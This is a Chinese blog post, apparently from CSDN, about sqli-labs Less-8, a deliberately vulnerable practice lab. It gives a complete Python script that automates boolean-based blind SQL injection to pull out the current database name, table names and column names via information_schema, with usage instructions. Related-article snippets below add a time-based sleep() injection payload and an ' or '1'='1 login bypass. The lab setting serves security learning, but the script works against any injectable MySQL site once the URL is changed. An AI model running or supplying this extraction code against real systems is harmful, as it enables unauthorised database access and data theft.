sqli-labs第8关 附爆破代码

最新推荐文章于 2024-07-18 23:28:31 发布
最新推荐文章于 2024-07-18 23:28:31 发布
阅读量266 收藏 3
点赞数 10
文章标签: 数据库 python 开发语言 网络安全 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73688004/article/details/137187547
版权

sqli-labs第8关

布尔盲注 python代码

参考了这篇博客:
跳转博客
笔者对其提供的代码进行了代码重写和优化,如下:

# the burp_schema.py is for 布尔盲注的爆破

import requests

url = "http://localhost/sqli-labs-master/Less-8" # 替换成实际的url

keylist=[chr(i) for i in range(33, 65)]
keylist+=[chr(i) for i in range(91, 127)] # keylist不包含大写字母,防止获取的name出现大小写重叠的情况

flag = 'You are in' # 替换成成功返回页面的标识

class Base():
    def __init__(self, min, max, payload1, payload2, len=0):
        self.min = min
        self.max = max
        self.payload1 = payload1
        self.payload2 = payload2  # 这个payload2用于获取name
        self.len = len  # 存储name的长度

    def get_length(self):
        l = self.min
        r = self.max
        while l <= r:         # 二分法求长度
            mid = (r + l) // 2
            payload1 = self.payload1 + str(mid) + "-- ss"
            param = {
                "id":payload1,
            }
            response = requests.get(url, params=param)
            # print(param)
            if response.text.find(flag) != -1:
                l = mid + 1
            else:
                r = mid - 1
        mid += 1
        print("len: " + str(mid), end='\n')
        self.len = mid               # 设置类的长度

    def get_name(self):
        db = ''
        for i in range(1, self.len + 1):
            for c in keylist:
                payload2 = self.payload2 + str(i) + ",1 )= '" + c + "'-- ss"
                param = {
                    "id": payload2,
                }
                response = requests.get(url, params=param)
                if response.text.find(flag) != -1:
                    db = db + c
        print("name: " + str(db), end='\n')

def GetCurrentDatabase():
    payload1 = "1' and (length(database()))>"
    payload2 = "1' and substring(database(),"
    database = Base(0, 10, payload1, payload2)
    database.get_length()
    database.get_name()

def GetTables():
    payload1 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"
    payload2 = "1' and substr((select group_concat(table_name) from information_schema.tables where table_schema = database()),"
    table = Base(0, 100, payload1, payload2)
    len = table.get_length()
    table.get_name()

def GetColumns(table):
    payload1 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema=database())))>"
    payload2 = "1' and substr((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema=database()),"
    columns = Base(0, 100, payload1, payload2)
    columns.get_length()
    columns.get_name()

GetCurrentDatabase()
GetTables()
#GetColumns()

重写后代码仅75行,利用率提高。

使用方法

python burp_schema.py
得到结果如图:
结果图
得到表名字后,修改python程序的最后一行,想得到什么表的字段,就在GetColumns()里面填入表名字。例子:
修改为:

GetColumns(users)

运行之后结果如下:
在这里插入图片描述

Coding Happily
关注
  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli-labs-master第八
FourthGuy的博客
10-09 1623
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
Sqli-labs靶场第8详解[Sqli-labs-less-8]
m0_73615178的博客
02-24 1075
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()sql注入——布尔型盲注(Boolean-based blind)
sqli-labs 靶场 less-8、9、10 第八到第十详解:布尔注入,时间注入
Superstacks超全栈
06-09 493
S接下来的工作就是之前使用的布尔注入流程一样,通过一个个字的判断来确定是否为想要的字符。如此便可以采用和上面类似的盲注入代码来进行。执行结果,成功完成注入(有一说一,代码请求量一多这脚本运行时间真的长!但是你会发现,在获取用户密码的时候会有很多空字符,这里是什么原因呢?输入注入代码,通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息,也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行,当输入下列参数时可以看到页面需要。通过以上信息来看可以确定,这一可以用。
sqli-labs靶场8(布尔盲注)
qq_46527080的博客
12-12 2234
知识点 函数 ascii()函数 将某个字符串转化为ascii值(webRobot转换工具) ord()函数 将某个字符串转化为ascii值 length()函数 返回字段/结果/函数的长度,length(column_name) length(database()) 即返回当前数据库名长度 substr()函数 截取字符段长度 例如:substr(abcd,1,1) 从第一位开始(也就是从a开始)截取一个字符,就是a substr(abcd,2
sqli-labs卡8(基于get提交的单引号闭合的布尔盲注)通思路
zyh1588的博客
10-29 580
小白对sqli-labs靶场第八布尔盲注的理解
sqli.labs靶场(8-17
喜欢创作各种技术类文章,希望可以帮到你
01-28 796
爆users表字段名:id=1%27%20and%20if(substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)=\"{a}\",sleep(5),0)%20--+
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs-master/Less-8~10/
最新发布
2301_80793533的博客
07-18 207
观察浏览器的回应,你会发现浏览器无法迅速回应,当输入?id=1 and sleep(5)--+时,回应又非常迅速,这是因为sleep()这个函数,当id=1'成立时,会执行sleep(5),页面延迟回显,那么,注入点就能判断出来了。承接上篇blog,今天我们直接跳过第7,直接进入8-10,8-10本质上都是一种体型,而且语法改变得也并不大,话不多说,直接开始第8。显示没了,无法判断到底是什么进行的闭合,所以报错注入也无法继续,那就先试试盲注(新知识点了),输入。接着同样的方法,输入。
sqli-labs第八(布尔盲注)
qq_42266432的博客
08-19 1274
第八看标题可知此可以使用布尔盲注,布尔盲注我的理解是页面不会回显错误,但是注入等式或不等式时通过页面的反应能判断出注入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
sqli-labs 第八 较详细通解释】
m0_71635484的博客
02-17 890
sqli-labs第八详解
sqli-labs第八-布尔盲注
qq_56726035的博客
04-08 341
sqli-labs第八
sqli-labs靶场第八
gou1791241251的博客
12-26 1693
开始第八,传入id参数看看吧! 第一步:判断注入类型 传入单引号的时候页面显示异常了,说明闭合方式是含有单引号的! 通过使用and 1=1 和and 1=2的状态来判断是否是单引号闭合吧 显然此时是单引号闭合,有布尔类型状态。使用布尔盲注 第二步:判断有多少个字段,使用order by 一共有三个字段 以下便是通过布尔盲注来获取数据库信息的操作了,可以参考sqli-labs第六 ...
这就是布尔盲注么?爱了爱了。
qq_51954912的博客
03-29 125
布尔盲注简单操作布尔简介第八注入记录 布尔简介 布尔注入并非联合注入那般,会直接输出数据库名称,布尔注入只会输出两种类型的界面,在sqli-labs里只有什么都不输出和you are in这代表着错误,和正确,这正好可以利用进行布尔盲注。并未讲用工具注入,用burp注入等学过了在写。(因为视频是用sqli-labs第八演示的,我也用第八。) 第八注入记录 1.判断字符型注入还是整型注入 看来是字符注入 2.判断闭合符号 由此可判断为‘)和’ 判断出闭合符号。 3.也可以通过报错来判断字段 依
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7468
sqli-labs,sql注入,burpsuit
sqli-labs第八
07-23
对于sqli-labs的第八,你可以尝试使用SQL注入来绕过登录验证。以下是一种可能的解决方案: 1. 在登录表单的用户名字段中输入 `' or '1'='1`,并在密码字段中输入任意值。 2. 提交表单后,应该会成功绕过登录验证并获得访问权限。 请注意,这只是一种解决方案,具体的步骤可能因sqli-labs的不同版本而有所不同。在尝试任何实验室之前,请确保已经了解并遵守所有适用的法律和道德规范。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值